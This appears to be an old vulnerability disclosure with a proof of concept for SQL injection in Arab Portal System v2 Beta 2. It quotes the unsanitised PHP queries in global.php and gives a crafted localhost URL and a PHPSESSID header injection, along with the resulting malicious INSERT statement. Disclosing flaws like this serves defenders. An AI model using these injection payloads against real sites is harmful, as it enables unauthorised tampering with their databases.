arabPortalSQL.txt

`Hi .. This is small bug for Arab Portal System v2 Beta 2  
  
File name :- global.php  
Remote:- Yes  
Credit :-   
  
Devil-00   
  
Messenger :- <[email protected]>  
E-Mail :- <[email protected]>  
  
//--# Devil SQL Injection  
/*  
This SQL can do when :-  
magic_quotes_gpc = Off   
$session_id << Bad Var  
  
Attacking :-  
http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5  
  
Edit HTTPHeader [ PHPSESSID ] = SQL Injection  
*/  
$apt->query("DELETE FROM rafia_online WHERE onlineSID ='$session_id' or timestamp < $timeout");  
#--//  
  
//--# Devil SQL Injection  
/*  
Devil-00 .. [email protected]  
This SQL can do when :-  
magic_quotes_gpc = Off   
  
$REQUEST_URI << Bad Var  
$session_id << Bad Var  
  
Attacking URL :-  
http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5&','010','Hacker','0')/*  
  
SQL Well Be  
  
INSERT INTO rafia_online (timestamp,onlineip,  
onlinefile,onlinepage,onlineSID,user_online,useronlineid) VALUES ('1134309930','127.0.0.1','/Arab_Portal_v.2.0_beta_2/link.php',  
'/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5','0202020','Hacker','0')/*','6038e5a71794874f0130af05ec05501b','Guest','0')  
  
Onlines :-  
Guest يتواجد في ---  
Hacker يتواجد في ---  
*/  
$apt->query("INSERT INTO rafia_online (timestamp,  
onlineip,  
onlinefile,  
onlinepage,  
onlineSID,  
user_online,  
useronlineid)  
VALUES ('$timestamp',  
'$online_ip',  
'$PHP_SELF',  
'$REQUEST_URI',   
'$session_id',  
'$useronline',  
'$useronlineid')");  
#--//  
`